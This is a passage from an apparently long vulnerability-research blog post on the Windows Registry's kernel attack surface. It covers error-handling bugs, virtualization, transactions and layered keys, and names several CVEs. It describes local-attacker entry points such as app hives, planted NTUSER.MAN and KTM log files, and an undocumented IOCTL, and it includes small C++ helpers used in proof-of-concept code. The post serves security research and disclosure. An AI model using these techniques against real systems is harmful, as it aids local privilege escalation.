local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user: There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers. The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed. One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code: NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {   // ...   if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||       !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {     CmpFreeKeyByCell(Hive, NewNameKey);     return STATUS_INSUFFICIENT_RESOURCES;   }   // ... } The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition. A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing. Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.Susceptibility to mishandling partial successes The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure. This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them. A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.Overall complexity introduced over time One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a full-time registry expert that has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions: The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name. Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft. The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below: Some examples of bugs caused by incorrect interactions between these mechanisms include CVE-2023-21675, CVE-2023-21748, CVE-2023-35356, CVE-2023-35357 and CVE-2023-35358.Entry points This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.Hive loading Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers). When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.App hives The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism. It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors: They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.KTM transactions are unconditionally blocked for app hives. Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.User hives and Mandatory User Profiles Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\NTUSER.DAT mounted under \Registry\User\, or in other words, HKCU) or the user classes hive (C:\Users\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem. The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s),  and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved. The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it. A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.Log file parsing: .LOG/.LOG1/.LOG2 One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family. Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. Another one is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE"). These formats are well-documented in two unofficial regf documentations: GitHub: libyal/libregf and GitHub: msuhanov/regf.  Additional information can be found in the "Stable storage" and "Incremental logging" subsections of the Windows Internals (Part 2, 7th Edition) book and its earlier editions. From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.Log file parsing: KTM logs Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic. KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph. Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time. Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.Direct registry operations through standard syscalls Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall: Operation name Registry API name(s) System call(s) Internal kernel handler (if different than syscall) Load hive RegLoadKey RegLoadAppKey NtLoadKeyNtLoadKey2 NtLoadKeyEx NtLoadKey3 - Count open subkeys in hive - NtQueryOpenSubKeys - Flush hive RegFlushKey NtFlushKey - Open key RegOpenKeyEx RegOpenKeyTransacted NtOpenKey NtOpenKeyEx NtOpenKeyTransacted NtOpenKeyTransactedEx CmpParseKey Create key RegCreateKeyEx RegCreateKeyTransacted NtCreateKey NtCreateKeyTransacted CmpParseKey Delete key RegDeleteKeyExRegDeleteKeyTransacted NtDeleteKey - Rename key RegRenameKey NtRenameKey - Set key security RegSetKeySecurity NtSetSecurityObject CmpSecurityMethod Query key security RegGetKeySecurity NtQuerySecurityObject CmpSecurityMethod Set key information - NtSetInformationKey - Query key information RegQueryInfoKey NtQueryKey - Enumerate subkeys RegEnumKeyEx NtEnumerateKey - Notify on key change RegNotifyChangeKeyValue NtNotifyChangeKey NtNotifyChangeMultipleKeys - Query key path - NtQueryObject CmpQueryKeyName Close key handle RegCloseKey NtClose CmpCloseKeyObject CmpDeleteKeyObject Set value RegSetValueEx NtSetValueKey - Delete value RegDeleteValue NtDeleteValueKey - Enumerate values RegEnumValue NtEnumerateValueKey - Query value data RegQueryValueEx NtQueryValueKey - Query multiple values RegQueryMultipleValues NtQueryMultipleValueKey - Some additional comments:A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes. Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:NtCompactKeysNtCompressKeyNtFreezeRegistryNtInitializeRegistryNtLockRegistryKeyNtQueryOpenSubKeysExNtReplaceKeyNtRestoreKeyNtSaveKeyNtSaveKeyExNtSaveMergedKeysNtThawRegistryNtUnloadKeyNtUnloadKey2NtUnloadKeyExIncorporating advanced features Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls: This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on. In the following sections, we will take a closer look at each of the possible complications.Predefined keys and symbolic links Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system. When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel. As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.Registry virtualization Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions: CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore. All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met: Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it. With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below: BOOL EnableTokenVirtualization(HANDLE hToken, BOOL bEnabled) {   DWORD dwVirtualizationEnabled = bEnabled;   return SetTokenInformation(hToken,                              TokenVirtualizationEnabled,                              &dwVirtualizationEnabled,                              sizeof(dwVirtualizationEnabled)); } BOOL EnableKeyVirtualization(HKEY hKey,                              BOOL VirtualTarget,                              BOOL VirtualStore,                              BOOL VirtualSource) {   KEY_SET_VIRTUALIZATION_INFORMATION VirtInfo;   VirtInfo.VirtualTarget = VirtualTarget;   VirtInfo.VirtualStore = VirtualStore;   VirtInfo.VirtualSource = VirtualSource;   VirtInfo.Reserved = 0;   NTSTATUS Status = NtSetInformationKey(hKey,                                         KeySetVirtualizationInformation,                                         &VirtInfo,                                         sizeof(VirtInfo));   return NT_SUCCESS(Status); } And their example use: HANDLE hToken; HKEY hKey; // // Enable virtualization for the token. // if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) {   printf("OpenProcessToken failed with error %u\n", GetLastError());   return 1; } EnableTokenVirtualization(hToken, TRUE); // // Enable virtualization for the key. // hKey = RegOpenKeyExW(...); EnableKeyVirtualization(hKey,                         /*VirtualTarget=*/TRUE,                         /*VirtualStore=*/ TRUE,                         /*VirtualSource=*/FALSE);Transactions There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. The functions responsible for all three actions in each type of transaction are shown in the table below: Operation KTM (API) KTM (system call) Lightweight (API) Lightweight (system call) Create transaction CreateTransaction NtCreateTransaction - NtCreateRegistryTransaction Rollback transaction RollbackTransaction NtRollbackTransaction - NtRollbackRegistryTransaction Commit transaction CommitTransaction NtCommitTransaction - NtCommitRegistryTransaction As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes: NTSTATUS NtCreateRegistryTransaction(PHANDLE OutputHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, ULONG Reserved); NTSTATUS NtRollbackRegistryTransaction(HANDLE Handle, ULONG Reserved); NTSTATUS NtCommitRegistryTransaction(HANDLE Handle, ULONG Reserved); Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient. From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified. But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.Layered keys Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first. Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example: By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey), By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero). I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys. All of these references are great resources that can provide a good starting point for further analysis. When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward. As I wrote in blog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall. Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey. Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the 